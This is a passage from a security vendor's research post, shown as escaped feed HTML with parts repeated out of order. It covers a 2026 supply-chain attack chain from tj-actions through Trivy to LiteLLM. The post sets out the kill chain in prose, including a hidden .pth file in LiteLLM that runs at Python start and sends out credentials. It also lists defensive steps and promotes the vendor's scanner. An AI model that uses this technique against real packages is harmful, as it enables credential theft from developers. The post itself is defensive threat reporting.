 &lt;p style="color: #2d3748 !important; font-size: 1.0625rem !important; line-height: 1.8 !important; margin-bottom: 1.25rem !important;"&gt;After the tj-actions attack in early March, Vigilant built and open-sourced &lt;a href="https://www.vigilantdefense.com/resources/runner-guard" style="color: #00a19b; text-decoration: none; font-weight: 600;"&gt;Runner Guard&lt;/a&gt;, a free CI/CD security scanner, and conducted the largest scan of its kind, examining the 50,000 most-starred repositories on GitHub for the exact vulnerability classes that enabled this attack chain.&lt;/p&gt; 
 &lt;p style="color: #2d3748 !important; font-size: 1.0625rem !important; line-height: 1.8 !important; margin-bottom: 1.25rem !important;"&gt;Our scan of the LiteLLM repository specifically found &lt;strong style="color: #07161d;"&gt;135 CI/CD vulnerabilities across 6 rule categories&lt;/strong&gt; before this attack occurred. Across the broader dataset of 50,000 repositories, we found &lt;strong style="color: #07161d;"&gt;192,776 CI/CD vulnerabilities&lt;/strong&gt; affecting &lt;strong style="color: #07161d;"&gt;20,265 repositories&lt;/strong&gt;, with &lt;strong style="color: #07161d;"&gt;590 million downstream forks&lt;/strong&gt; inheriting these vulnerable configurations.&lt;/p&gt; 
 &lt;p style="color: #2d3748 !important; font-size: 1.0625rem !important; line-height: 1.8 !important; margin-bottom: 1.25rem !important;"&gt;The most popular, most trusted projects are the most exposed. Repositories with 50,000+ stars have a 68% vulnerability rate. Vigilant is the first and only organization to conduct research at this scale. The full findings are published at &lt;a href="https://www.vigilantdefense.com/research/github-top-50k-repos-cicd-security-scan" style="color: #00a19b; text-decoration: none; font-weight: 600;"&gt;vigilantdefense.com/research&lt;/a&gt;.&lt;/p&gt;  
 &lt;div style="background: #07161D; border-radius: 8px; padding: 28px 32px; margin: 36px 0; text-align: center;"&gt; 
  &lt;p style="margin: 0 0 6px 0; font-size: 10px; font-weight: bold; letter-spacing: 2.5px; color: #00a19b; text-transform: uppercase; font-family: 'Barlow',Arial,sans-serif;"&gt;Continuous Monitoring&lt;/p&gt; 
  &lt;p style="margin: 0 0 8px 0; font-size: 20px; font-weight: 800; color: #ffffff; line-height: 1.3; font-family: 'Barlow',Arial,sans-serif;"&gt;Runner Guard Was Built on ThreatCERT&lt;/p&gt; 
  &lt;p style="margin: 0 0 20px 0; font-size: 14px; line-height: 1.6; color: #7a9bad; font-family: 'Barlow',Arial,sans-serif;"&gt;Runner Guard is the free, open-source scanner. ThreatCERT is the enterprise platform behind it: continuous CI/CD monitoring, supply chain risk scoring, and real-time alerting correlated with network, DNS, TLS, and dark web intelligence across your entire vendor chain.&lt;/p&gt; 
  &lt;a href="https://www.vigilantdefense.com/threatcert" style="display: inline-block; padding: 14px 36px; background-color: #00a19b; border-radius: 4px; font-size: 14px; font-weight: bold; color: #ffffff; text-decoration: none; letter-spacing: 0.5px; font-family: 'Barlow',Arial,sans-serif;"&gt;LEARN ABOUT THREATCERT&lt;/a&gt; 
 &lt;/div&gt; 
 &lt;h2 style="margin: 36px 0 12px 0; font-size: 22px; font-weight: 800; color: #07161d; font-family: 'Barlow',Arial,sans-serif;"&gt;Recommended Actions&lt;/h2&gt; 
 &lt;h3 style="margin: 24px 0 8px 0; font-size: 14px; font-weight: bold; color: #07161d; text-transform: uppercase; letter-spacing: 1px; font-family: 'Barlow',Arial,sans-serif;"&gt;Immediate: Next 24 Hours&lt;/h3&gt; 
 &lt;ol style="margin: 0 0 24px 0; padding-left: 24px;"&gt; 
  &lt;li style="margin-bottom: 12px;"&gt;&lt;strong style="color: #07161d;"&gt;Check for LiteLLM exposure.&lt;/strong&gt; Determine if any system, application, or developer machine in your environment has LiteLLM installed. Check both direct installations and transitive dependencies. If versions 1.82.7 or 1.82.8 are present, assume all credentials on that machine have been compromised.&lt;/li&gt; 
  &lt;li style="margin-bottom: 12px;"&gt;&lt;strong style="color: #07161d;"&gt;Rotate all AI API keys and cloud credentials.&lt;/strong&gt; If LiteLLM was present in any form, rotate every API key, cloud credential, and SSH key on the affected systems. This includes OpenAI, Anthropic, Azure, AWS, and any other service credentials that were accessible as environment variables.&lt;/li&gt; 
  &lt;li style="margin-bottom: 12px;"&gt;&lt;strong style="color: #07161d;"&gt;Freeze all open-source package updates.&lt;/strong&gt; Do not update any open-source dependency until it has been verified as safe. This applies to pip, npm, go modules, and any other package manager. The supply chain is actively under attack. Treat every update as potentially hostile until verified.&lt;/li&gt; 
  &lt;li style="margin-bottom: 12px;"&gt;&lt;strong style="color: #07161d;"&gt;Review CI/CD pipeline dependencies.&lt;/strong&gt; Identify every third-party tool, action, or scanner that runs in your build pipelines. If any are pulled without version pinning or integrity verification, they are a potential entry point for this same attack pattern.&lt;/li&gt; 
 &lt;/ol&gt; 
 &lt;h3 style="margin: 24px 0 8px 0; font-size: 14px; font-weight: bold; color: #07161d; text-transform: uppercase; letter-spacing: 1px; font-family: 'Barlow',Arial,sans-serif;"&gt;Near-Term: Next 7 Days&lt;/h3&gt; 
 &lt;ol style="margin: 0 0 24px 0; padding-left: 24px;" start="5"&gt; 
  &lt;li style="margin-bottom: 12px;"&gt;&lt;strong style="color: #07161d;"&gt;Scan your repositories with Runner Guard.&lt;/strong&gt; Vigilant's open-source CI/CD scanner detects the exact vulnerability classes exploited in this attack chain. It is free, takes one command to run, and covers 15 security rule categories including supply chain trust, injection, privilege escalation, and AI agent configuration risks.&lt;/li&gt; 
 &lt;/ol&gt; 
 &lt;div style="background-color: #07161d; padding: 16px 20px; border-radius: 4px; margin: 0 0 24px 0;"&gt; 
  &lt;p style="margin: 0 0 4px 0; font-size: 12px; color: #7a9bad; font-family: 'Courier New',monospace;"&gt;$ brew install Vigilant-LLC/tap/runner-guard&lt;/p&gt; 
  &lt;p style="margin: 0; font-size: 12px; color: #00a19b; font-family: 'Courier New',monospace;"&gt;$ runner-guard scan .&lt;/p&gt; 
 &lt;/div&gt; 
 &lt;ol style="margin: 0 0 24px 0; padding-left: 24px;" start="6"&gt; 
  &lt;li style="margin-bottom: 12px;"&gt;&lt;strong style="color: #07161d;"&gt;Scan any third-party open-source project before adoption or update.&lt;/strong&gt; Clone the repository locally and run Runner Guard against it before integrating it into your environment. If it has unpinned dependencies, overly permissive tokens, or injection vulnerabilities in its CI/CD pipeline, those are the exact entry points attackers are exploiting right now.&lt;/li&gt; 
  &lt;li style="margin-bottom: 12px;"&gt;&lt;strong style="color: #07161d;"&gt;Implement version pinning.&lt;/strong&gt; Every GitHub Action, every package dependency, and every tool in your CI/CD pipeline should be pinned to an immutable hash, not a mutable version tag. Tags like &lt;code style="background: #F0F0F0; padding: 2px 6px; border-radius: 3px; font-size: 14px;"&gt;@v3&lt;/code&gt; or &lt;code style="background: #F0F0F0; padding: 2px 6px; border-radius: 3px; font-size: 14px;"&gt;@latest&lt;/code&gt; can be silently redirected to malicious code. SHA pinning is the only reliable defense.&lt;/li&gt; 
  &lt;li style="margin-bottom: 12px;"&gt;&lt;strong style="color: #07161d;"&gt;Establish an update verification process.&lt;/strong&gt; No open-source package should be updated in production environments without first verifying the new version against known-good checksums, reviewing the changelog for unexpected changes, and scanning the project's CI/CD configuration for vulnerabilities.&lt;/li&gt; 
 &lt;/ol&gt; 
 &lt;h2 style="margin: 36px 0 12px 0; font-size: 22px; font-weight: 800; color: #07161d; font-family: 'Barlow',Arial,sans-serif;"&gt;Supply Chain Security Best Practices&lt;/h2&gt; 
 &lt;ul style="margin: 0 0 24px 0; padding-left: 24px;"&gt; 
  &lt;li style="margin-bottom: 12px;"&gt;&lt;strong style="color: #07161d;"&gt;Do not update any open-source package today without scanning it first.&lt;/strong&gt; The supply chain is actively compromised. Treat every update as suspicious until verified.&lt;/li&gt; 
  &lt;li style="margin-bottom: 12px;"&gt;&lt;strong style="color: #07161d;"&gt;Be careful what you install.&lt;/strong&gt; Transitive dependencies are attack vectors. LiteLLM was pulled as a dependency of other packages. Developers who never directly installed it were still compromised.&lt;/li&gt; 
  &lt;li style="margin-bottom: 12px;"&gt;&lt;strong style="color: #07161d;"&gt;Pin everything.&lt;/strong&gt; Mutable version tags are the root cause of this entire attack chain. SHA pinning for GitHub Actions. Lock files with integrity hashes for package managers. No exceptions.&lt;/li&gt; 
  &lt;li style="margin-bottom: 12px;"&gt;&lt;strong style="color: #07161d;"&gt;Apply least-privilege to CI/CD tokens.&lt;/strong&gt; If LiteLLM's PyPI publish token had been scoped to only run during tagged releases with manual approval, the attacker could not have pushed a malicious version from a compromised build step.&lt;/li&gt; 
  &lt;li style="margin-bottom: 12px;"&gt;&lt;strong style="color: #07161d;"&gt;Monitor for anomalous package behavior.&lt;/strong&gt; The LiteLLM compromise was discovered because a developer's machine ran out of RAM from a fork bomb in the payload. Not every compromise will be that obvious. Monitor for unexpected network connections, environment variable access, and file system changes from your dependencies.&lt;/li&gt; 
 &lt;/ul&gt;  
 &lt;div style="background: #07161D; padding: 24px 28px; border-radius: 6px; margin: 36px 0;"&gt; 
  &lt;p style="margin: 0; font-size: 18px; font-weight: bold; color: #ffffff; line-height: 1.6; font-family: 'Barlow',Arial,sans-serif;"&gt;Three attacks in three weeks. Each one used the last as a stepping stone. The 20,000 other vulnerable repositories we identified are the next target list. Scan your repos before someone else does.&lt;/p&gt; 
 &lt;/div&gt;  
 &lt;div style="margin: 36px 0;"&gt; 
  &lt;div style="display: inline-block; width: 48%; background: #07161D; border-radius: 8px; padding: 24px; text-align: center; vertical-align: top; margin-right: 2%;"&gt; 
   &lt;p style="margin: 0 0 8px 0; font-size: 10px; font-weight: bold; letter-spacing: 2px; color: #ff5d2c; text-transform: uppercase; font-family: 'Barlow',Arial,sans-serif;"&gt;Free Tool&lt;/p&gt; 
   &lt;p style="margin: 0 0 16px 0; font-size: 16px; font-weight: bold; color: #ffffff; line-height: 1.4; font-family: 'Barlow',Arial,sans-serif;"&gt;Download Runner Guard&lt;/p&gt; 
   &lt;a href="https://www.vigilantdefense.com/resources/runner-guard" style="display: inline-block; padding: 12px 24px; background-color: #ff5d2c; border-radius: 4px; font-size: 13px; font-weight: bold; color: #ffffff; text-decoration: none; font-family: 'Barlow',Arial,sans-serif;"&gt;SCAN NOW - FREE&lt;/a&gt; 
  &lt;/div&gt; 
  &lt;div style="display: inline-block; width: 48%; background: #0D2B3E; border-radius: 8px; padding: 24px; text-align: center; vertical-align: top; border: 1px solid #1A3D54;"&gt; 
   &lt;p style="margin: 0 0 8px 0; font-size: 10px; font-weight: bold; letter-spacing: 2px; color: #00a19b; text-transform: uppercase; font-family: 'Barlow',Arial,sans-serif;"&gt;Enterprise Platform&lt;/p&gt; 
   &lt;p style="margin: 0 0 16px 0; font-size: 16px; font-weight: bold; color: #ffffff; line-height: 1.4; font-family: 'Barlow',Arial,sans-serif;"&gt;ThreatCERT by Vigilant&lt;/p&gt; 
   &lt;a href="https://www.vigilantdefense.com/threatcert" style="display: inline-block; padding: 12px 24px; background-color: #00a19b; border-radius: 4px; font-size: 13px; font-weight: bold; color: #ffffff; text-decoration: none; font-family: 'Barlow',Arial,sans-serif;"&gt;LEARN MORE&lt;/a&gt; 
  &lt;/div&gt; 
 &lt;/div&gt;  
 &lt;div style="background: #F8FAFB; border-radius: 8px; padding: 20px 24px; border: 1px solid #E8ECF0; margin: 0 0 36px 0; text-align: center;"&gt; 
  &lt;p style="margin: 0 0 12px 0; font-size: 16px; font-weight: bold; color: #07161d; font-family: 'Barlow',Arial,sans-serif;"&gt;Read the Full 50K Scan Research&lt;/p&gt; 
  &lt;p style="margin: 0 0 16px 0; font-size: 13px; line-height: 1.6; color: #4a5568; font-family: 'Barlow',Arial,sans-serif;"&gt;The largest CI/CD security scan ever conducted. 50,012 repos. 192,776 findings.&lt;/p&gt; 
  &lt;a href="https://www.vigilantdefense.com/research/github-top-50k-repos-cicd-security-scan" style="display: inline-block; padding: 12px 28px; background-color: #315068; border-radius: 4px; font-size: 13px; font-weight: bold; color: #ffffff; text-decoration: none; font-family: 'Barlow',Arial,sans-serif;"&gt;VIEW RESEARCH REPORT&lt;/a&gt; 
 &lt;/div&gt;  
 &lt;p style="margin: 0; font-size: 11px; color: #718096; line-height: 1.7; font-style: italic; border-top: 1px solid #E8ECF0; padding-top: 20px;"&gt;&lt;strong style="font-style: normal; color: #4a5568;"&gt;Sources:&lt;/strong&gt; The Register, The Hacker News, Wiz Security Blog, Snyk Security Research, ARMO Security, GitHub Advisory Database, Vigilant 50K Scan Research.&lt;/p&gt; 
&lt;/div&gt;</description>
      <content:encoded>&lt;div style="max-width: 720px; margin: 0 auto; font-family: 'Barlow',Arial,Helvetica,sans-serif; color: #2d3748; line-height: 1.75; font-size: 16px;"&gt; 
 &lt;p style="margin: 0 0 6px 0; font-size: 11px; font-weight: bold; letter-spacing: 2.5px; color: #ff5d2c; text-transform: uppercase;"&gt;Vigilant Research&lt;/p&gt; 
 &lt;h1 style="margin: 0 0 8px 0; font-size: 32px; font-weight: 800; color: #07161d; line-height: 1.2; font-family: 'Barlow',Arial,sans-serif;"&gt;Software Supply Chain Attack Escalation: Trivy, LiteLLM, and the 50K-Repo Vulnerability Landscape&lt;/h1&gt; 
 &lt;p style="margin: 0 0 28px 0; font-size: 14px; color: #718096;"&gt;March 25, 2026 &amp;nbsp;|&amp;nbsp; Threat Level: &lt;strong style="color: #ff5d2c;"&gt;CRITICAL&lt;/strong&gt;&lt;/p&gt;  
 &lt;p style="color: #2d3748 !important; font-size: 1.0625rem !important; line-height: 1.8 !important; margin-bottom: 1.25rem !important;"&gt;Over the past three weeks, a threat actor known as &lt;strong style="color: #07161d;"&gt;TeamPCP&lt;/strong&gt; has executed a cascading software supply chain attack that represents the most significant CI/CD threat tracked to date. What began as a single compromised GitHub Action has escalated into a multi-hop campaign that has now reached the AI infrastructure layer, compromising the package that manages LLM API keys for organizations worldwide.&lt;/p&gt; 
 &lt;p style="color: #2d3748 !important; font-size: 1.0625rem !important; line-height: 1.8 !important; margin-bottom: 1.25rem !important;"&gt;This is not theoretical. Three confirmed attacks in three weeks, each using the previous compromise as a stepping stone:&lt;/p&gt; 
 &lt;ul style="margin: 0 0 12px 0; padding-left: 24px;"&gt; 
  &lt;li style="margin-bottom: 8px;"&gt;&lt;strong style="color: #07161d;"&gt;March 12 - tj-actions/changed-files:&lt;/strong&gt; Attackers compromised a widely-used GitHub Action, injecting code that stole secrets from thousands of CI/CD pipelines&lt;/li&gt; 
  &lt;li style="margin-bottom: 8px;"&gt;&lt;strong style="color: #07161d;"&gt;March 19 - Aqua Security Trivy:&lt;/strong&gt; The same attackers compromised Trivy, one of the most widely-used open-source vulnerability scanners. The tool designed to find security issues became the attack vector&lt;/li&gt; 
  &lt;li style="margin-bottom: 8px;"&gt;&lt;strong style="color: #07161d;"&gt;March 24 - BerriAI LiteLLM:&lt;/strong&gt; LiteLLM, the most popular AI API key management gateway (97 million monthly downloads), was backdoored via its own CI/CD pipeline, which ran the compromised Trivy scanner. Every organization that updated to version 1.82.7 or 1.82.8 had all environment variables, SSH keys, cloud credentials, and AI API keys exfiltrated to an attacker-controlled server&lt;/li&gt; 
 &lt;/ul&gt; 
 &lt;p style="color: #2d3748 !important; font-size: 1.0625rem !important; line-height: 1.8 !important; margin-bottom: 1.25rem !important;"&gt;Vigilant anticipated this escalation pattern. Three weeks ago, we completed the &lt;strong style="color: #07161d;"&gt;largest CI/CD security scan ever conducted&lt;/strong&gt;, scanning the 50,000 most-starred repositories on GitHub. We found that &lt;strong style="color: #07161d;"&gt;20,265 repositories (40.6%) have the same class of vulnerability&lt;/strong&gt; that enabled this attack chain. The full research is published at &lt;a href="https://www.vigilantdefense.com/research/github-top-50k-repos-cicd-security-scan" style="color: #00a19b; text-decoration: none; font-weight: 600;"&gt;vigilantdefense.com/research&lt;/a&gt;.&lt;/p&gt;    
 &lt;div style="background: #141922; padding: 28px 28px 32px; font-family: 'Georgia',serif; border-radius: 14px; margin: 36px 0;"&gt; 
  &lt;div style="font-family: sans-serif; font-size: 11px; font-weight: bold; letter-spacing: .14em; color: #2db8a0; margin-bottom: 18px;"&gt;
   VIGILANT 
   &lt;span style="color: #ffffff66;"&gt;/&lt;/span&gt; RESEARCH
  &lt;/div&gt; 
  &lt;div style="font-family: sans-serif; font-size: 26px; font-weight: 800; color: #f0ede8; line-height: 1.2; margin-bottom: 6px;"&gt;
   How a security scanner
   &lt;br&gt;became the weapon
  &lt;/div&gt; 
  &lt;div style="width: 48px; height: 3px; background: #e5533a; margin: 14px 0 16px;"&gt;
   &amp;nbsp;
  &lt;/div&gt; 
  &lt;div style="font-size: 15px; color: #8a9baa; line-height: 1.65; max-width: 520px; margin-bottom: 28px;"&gt;
   The Trivy-to-LiteLLM attack chain: how attackers turned the most popular vulnerability scanner into a delivery mechanism for backdooring the #1 AI key management library.
  &lt;/div&gt;  
  &lt;div style="font-family: sans-serif; font-size: 10px; font-weight: bold; letter-spacing: .12em; color: #2db8a0; margin-bottom: 14px;"&gt;
   THE THREE-HOP CHAIN
  &lt;/div&gt; 
  &lt;div style="margin-bottom: 28px;"&gt; 
   &lt;div style="display: inline-block; padding: 8px 14px; background: #1c2433; border-radius: 6px; vertical-align: middle;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 12px; color: #8a9baa;"&gt;
     March 12
    &lt;/div&gt; 
    &lt;div style="font-family: sans-serif; font-size: 15px; font-weight: bold; color: #c2cad4;"&gt;
     tj-actions
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;span style="font-size: 18px; color: #e5533a; padding: 0 6px; font-family: sans-serif; vertical-align: middle;"&gt;→&lt;/span&gt; 
   &lt;div style="display: inline-block; padding: 8px 14px; background: #1c2433; border-radius: 6px; border: 1px solid rgba(229,83,58,0.27); vertical-align: middle;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 12px; color: #8a9baa;"&gt;
     March 19
    &lt;/div&gt; 
    &lt;div style="font-family: sans-serif; font-size: 15px; font-weight: bold; color: #f0a080;"&gt;
     Trivy
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;span style="font-size: 18px; color: #e5533a; padding: 0 6px; font-family: sans-serif; vertical-align: middle;"&gt;→&lt;/span&gt; 
   &lt;div style="display: inline-block; padding: 8px 14px; background: #1c2433; border-radius: 6px; border: 1px solid #e5533a; vertical-align: middle;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 12px; color: #8a9baa;"&gt;
     March 24
    &lt;/div&gt; 
    &lt;div style="font-family: sans-serif; font-size: 15px; font-weight: bold; color: #f0a080;"&gt;
     LiteLLM
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;span style="font-size: 18px; color: #e5533a; padding: 0 6px; font-family: sans-serif; vertical-align: middle;"&gt;→&lt;/span&gt; 
   &lt;div style="display: inline-block; padding: 8px 14px; background: #162824; border-radius: 6px; border: 1px solid #2db8a0; vertical-align: middle;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 12px; color: #2db8a0;"&gt;
     Impact
    &lt;/div&gt; 
    &lt;div style="font-family: sans-serif; font-size: 15px; font-weight: bold; color: #2db8a0;"&gt;
     Every AI key in your org
    &lt;/div&gt; 
   &lt;/div&gt; 
  &lt;/div&gt;  
  &lt;div style="font-family: sans-serif; font-size: 10px; font-weight: bold; letter-spacing: .12em; color: #2db8a0; margin-bottom: 16px;"&gt;
   KILL CHAIN
  &lt;/div&gt; 
  &lt;div style="border-left: 2px solid #2a3545; padding-left: 20px; margin-bottom: 30px;"&gt; 
   &lt;div style="margin-bottom: 20px;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 14px; font-weight: bold; color: #f0ede8; margin-bottom: 3px;"&gt;
     &lt;span style="color: #e5533a;"&gt;●&lt;/span&gt; Step 1: Compromise Trivy
    &lt;/div&gt; 
    &lt;div style="font-size: 13px; color: #6a7a8a; line-height: 1.6;"&gt;
     TeamPCP backdoors Aqua Security's open-source vulnerability scanner through its GitHub Action. The tool meant to 
     &lt;em&gt;find&lt;/em&gt; malware becomes the delivery mechanism.
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;div style="margin-bottom: 20px;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 14px; font-weight: bold; color: #f0ede8; margin-bottom: 3px;"&gt;
     &lt;span style="color: #e5533a;"&gt;●&lt;/span&gt; Step 2: Trivy runs unpinned in LiteLLM's CI
    &lt;/div&gt; 
    &lt;div style="font-size: 13px; color: #6a7a8a; line-height: 1.6;"&gt;
     LiteLLM's build pipeline pulls Trivy from apt with no pinned version. When Trivy was compromised, attacker code ran automatically inside the build.
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;div style="margin-bottom: 20px;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 14px; font-weight: bold; color: #f0ede8; margin-bottom: 3px;"&gt;
     &lt;span style="color: #e5533a;"&gt;●&lt;/span&gt; Step 3: PyPI publish token stolen
    &lt;/div&gt; 
    &lt;div style="font-size: 13px; color: #6a7a8a; line-height: 1.6;"&gt;
     An overly permissive CI token was exfiltrated straight from the GitHub Actions runner. This token had the ability to push new packages to PyPI.
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;div style="margin-bottom: 20px;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 14px; font-weight: bold; color: #f0ede8; margin-bottom: 3px;"&gt;
     &lt;span style="color: #e5533a;"&gt;●&lt;/span&gt; Step 4: Malicious versions pushed to PyPI
    &lt;/div&gt; 
    &lt;div style="font-size: 13px; color: #6a7a8a; line-height: 1.6;"&gt;
     litellm 1.82.7 and 1.82.8 ship a hidden 
     &lt;span style="font-family: monospace; color: #2db8a0; font-size: 12px;"&gt;.pth&lt;/span&gt; file. It executes at Python start. No import needed. Just having the package installed is enough.
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;div style="margin-bottom: 20px;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 14px; font-weight: bold; color: #f0ede8; margin-bottom: 3px;"&gt;
     &lt;span style="color: #e5533a;"&gt;●&lt;/span&gt; Step 5: Credential harvesting
    &lt;/div&gt; 
    &lt;div style="font-size: 13px; color: #6a7a8a; line-height: 1.6;"&gt;
     The payload collects all environment variables, SSH keys, and cloud credentials, then sends everything to attacker-controlled infrastructure.
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;div&gt; 
    &lt;div style="font-family: sans-serif; font-size: 14px; font-weight: bold; color: #f0ede8; margin-bottom: 3px;"&gt;
     &lt;span style="color: #2db8a0;"&gt;●&lt;/span&gt; Step 6: Every AI key harvested
    &lt;/div&gt; 
    &lt;div style="font-size: 13px; color: #6a7a8a; line-height: 1.6;"&gt;
     LiteLLM is specifically designed to hold and manage API keys for OpenAI, Anthropic, Azure, AWS Bedrock, and every other major LLM provider. The attacker targeted the one package that by definition has access to every AI API key in an organization.
    &lt;/div&gt; 
   &lt;/div&gt; 
  &lt;/div&gt;  
  &lt;div style="margin-bottom: 28px;"&gt; 
   &lt;div style="display: inline-block; width: 31%; background: #1c2433; padding: 16px 20px; border-radius: 8px; vertical-align: top; margin-right: 2%;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 36px; font-weight: 800; color: #e5533a; line-height: 1;"&gt;
     97M
    &lt;/div&gt; 
    &lt;div style="font-family: sans-serif; font-size: 10px; letter-spacing: .1em; color: #5a6a7a; margin-top: 6px; font-weight: bold;"&gt;
     MONTHLY DOWNLOADS AT RISK
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;div style="display: inline-block; width: 31%; background: #1c2433; padding: 16px 20px; border-radius: 8px; vertical-align: top; margin-right: 2%;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 36px; font-weight: 800; color: #e5533a; line-height: 1;"&gt;
     20,265
    &lt;/div&gt; 
    &lt;div style="font-family: sans-serif; font-size: 10px; letter-spacing: .1em; color: #5a6a7a; margin-top: 6px; font-weight: bold;"&gt;
     REPOS WITH THE SAME VULN PROFILE
    &lt;/div&gt; 
   &lt;/div&gt; 
   &lt;div style="display: inline-block; width: 31%; background: #1c2433; padding: 16px 20px; border-radius: 8px; vertical-align: top;"&gt; 
    &lt;div style="font-family: sans-serif; font-size: 36px; font-weight: 800; color: #e5533a; line-height: 1;"&gt;
     590M
    &lt;/div&gt; 
    &lt;div style="font-family: sans-serif; font-size: 10px; letter-spacing: .1em; color: #5a6a7a; margin-top: 6px; font-weight: bold;"&gt;
     DOWNSTREAM FORKS EXPOSED
    &lt;/div&gt; 
   &lt;/div&gt; 
  &lt;/div&gt;  
  &lt;div style="background: #1c2433; border-radius: 8px; padding: 18px 20px; margin-bottom: 28px;"&gt; 
   &lt;div style="font-family: sans-serif; font-size: 10px; font-weight: bold; letter-spacing: .12em; color: #e5533a; margin-bottom: 14px;"&gt;
    WE SCANNED LITELLM BEFORE THIS ATTACK HAPPENED
   &lt;/div&gt; 
   &lt;div style="font-size: 13px; color: #8a9baa; line-height: 1.65; margin-bottom: 16px;"&gt;
    Our scan of GitHub's top 50K repos flagged 
    &lt;strong style="color: #f0ede8; font-family: sans-serif;"&gt;135 CI/CD vulnerabilities&lt;/strong&gt; in LiteLLM across 6 categories. Here is what the exposure looked like:
   &lt;/div&gt; 
   &lt;div&gt; 
    &lt;div style="margin-bottom: 8px;"&gt; 
     &lt;div style="display: inline-block; font-family: sans-serif; font-size: 22px; font-weight: 800; color: #e5533a; min-width: 36px; vertical-align: middle;"&gt;
      3
     &lt;/div&gt; 
     &lt;div style="display: inline-block; vertical-align: middle;"&gt; 
      &lt;div style="font-family: sans-serif; font-size: 12px; font-weight: bold; color: #f0ede8;"&gt;
       Critical vulnerabilities
      &lt;/div&gt; 
      &lt;div style="font-size: 12px; color: #5a6a7a;"&gt;
       Expression injection with secret exposure. Direct path to compromise
      &lt;/div&gt; 
     &lt;/div&gt; 
    &lt;/div&gt; 
    &lt;div style="height: 1px; background: #2a3545; margin-bottom: 8px;"&gt;
     &amp;nbsp;
    &lt;/div&gt; 
    &lt;div style="margin-bottom: 8px;"&gt; 
     &lt;div style="display: inline-block; font-family: sans-serif; font-size: 22px; font-weight: 800; color: #e5533a; min-width: 36px; vertical-align: middle;"&gt;
      60
     &lt;/div&gt; 
     &lt;div style="display: inline-block; vertical-align: middle;"&gt; 
      &lt;div style="font-family: sans-serif; font-size: 12px; font-weight: bold; color: #f0ede8;"&gt;
       Unpinned GitHub Actions
      &lt;/div&gt; 
      &lt;div style="font-size: 12px; color: #5a6a7a;"&gt;
       Any of these can be swapped for malicious code mid-build
      &lt;/div&gt; 
     &lt;/div&gt; 
    &lt;/div&gt; 
    &lt;div style="height: 1px; background: #2a3545; margin-bottom: 8px;"&gt;
     &amp;nbsp;
    &lt;/div&gt; 
    &lt;div style="margin-bottom: 8px;"&gt; 
     &lt;div style="display: inline-block; font-family: sans-serif; font-size: 22px; font-weight: 800; color: #e5533a; min-width: 36px; vertical-align: middle;"&gt;
      22
     &lt;/div&gt; 
     &lt;div style="display: inline-block; vertical-align: middle;"&gt; 
      &lt;div style="font-family: sans-serif; font-size: 12px; font-weight: bold; color: #f0ede8;"&gt;
       Overly permissive tokens
      &lt;/div&gt; 
      &lt;div style="font-size: 12px; color: #5a6a7a;"&gt;
       The exact class of flaw that handed attackers the PyPI publish key
      &lt;/div&gt; 
     &lt;/div&gt; 
    &lt;/div&gt; 
    &lt;div style="height: 1px; background: #2a3545; margin-bottom: 8px;"&gt;
     &amp;nbsp;
    &lt;/div&gt; 
    &lt;div style="margin-bottom: 8px;"&gt; 
     &lt;div style="display: inline-block; font-family: sans-serif; font-size: 22px; font-weight: 800; color: #e5533a; min-width: 36px; vertical-align: middle;"&gt;
      21
     &lt;/div&gt; 
     &lt;div style="display: inline-block; vertical-align: middle;"&gt; 
      &lt;div style="font-family: sans-serif; font-size: 12px; font-weight: bold; color: #f0ede8;"&gt;
       Comment/issue triggers without auth checks
      &lt;/div&gt; 
      &lt;div style="font-size: 12px; color: #5a6a7a;"&gt;
       External users can trigger privileged workflows
      &lt;/div&gt; 
     &lt;/div&gt; 
    &lt;/div&gt; 
    &lt;div style="height: 1px; background: #2a3545; margin-bottom: 8px;"&gt;
     &amp;nbsp;
    &lt;/div&gt; 
    &lt;div style="margin-bottom: 8px;"&gt; 
     &lt;div style="display: inline-block; font-family: sans-serif; font-size: 22px; font-weight: 800; color: #e5533a; min-width: 36px; vertical-align: middle;"&gt;
      20
     &lt;/div&gt; 
     &lt;div style="display: inline-block; vertical-align: middle;"&gt; 
      &lt;div style="font-family: sans-serif; font-size: 12px; font-weight: bold; color: #f0ede8;"&gt;
       Expression injection in action inputs
      &lt;/div&gt; 
      &lt;div style="font-size: 12px; color: #5a6a7a;"&gt;
       Unsanitized inputs that execute attacker-controlled code
      &lt;/div&gt; 
     &lt;/div&gt; 
    &lt;/div&gt; 
    &lt;div style="height: 1px; background: #2a3545; margin-bottom: 8px;"&gt;
     &amp;nbsp;
    &lt;/div&gt; 
    &lt;div style="margin-bottom: 0;"&gt; 
     &lt;div style="display: inline-block; font-family: sans-serif; font-size: 22px; font-weight: 800; color: #e5533a; min-width: 36px; vertical-align: middle;"&gt;
      9
     &lt;/div&gt; 
     &lt;div style="display: inline-block; vertical-align: middle;"&gt; 
      &lt;div style="font-family: sans-serif; font-size: 12px; font-weight: bold; color: #f0ede8;"&gt;
       Network exfiltration in privileged context
      &lt;/div&gt; 
      &lt;div style="font-size: 12px; color: #5a6a7a;"&gt;
       Outbound network access from steps with secret access
      &lt;/div&gt; 
     &lt;/div&gt; 
    &lt;/div&gt; 
   &lt;/div&gt; 
  &lt;/div&gt;  
  &lt;div style="background: #162824; border: 1px solid #2db8a0; border-radius: 8px; padding: 20px 24px; margin-bottom: 28px; text-align: center;"&gt; 
   &lt;div style="font-family: sans-serif; font-size: 10px; font-weight: bold; letter-spacing: .12em; color: #2db8a0; margin-bottom: 10px;"&gt;
    CONTINUOUS MONITORING
   &lt;/div&gt; 
